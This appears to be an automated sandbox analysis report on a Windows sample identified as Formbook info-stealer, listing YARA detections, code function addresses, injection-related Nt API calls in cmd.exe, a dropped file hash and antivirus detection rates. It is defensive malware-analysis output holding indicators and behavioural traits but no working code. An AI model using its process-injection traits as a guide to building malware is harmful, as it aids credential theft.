          Source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01191890
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_0119A184
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_0119C3BD
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_0119B3F1
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01199C12
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01197E88
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_011996A0
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041E819
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041E0B6
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00402D89
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00409E5B
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041DE2C
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041E79E
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0119A184
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_01191890
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0119C3BD
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0119B3F1
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_01199C12
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_01197E88
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_011996A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E528EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E520A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5E824
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA830
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E522AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E3FA2B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4DBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E403DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E52B28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4D466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E525DD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9D5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E51D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E52D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D80D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E52EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4D616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E51FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5DFCE
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 01192400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 01194599 appears 38 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 00D8B150 appears 72 times
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041A35A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041A40A NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041A53A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC9730 NtQueryVirtualMemory,
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fdvucso.exe 3D9400A6D9CA60C3BBE4212BA2727924E086A41CD2634D5CE1C4B8D9EE02F9DD
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeVirustotal: Detection: 41%
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeReversingLabs: Detection: 43%
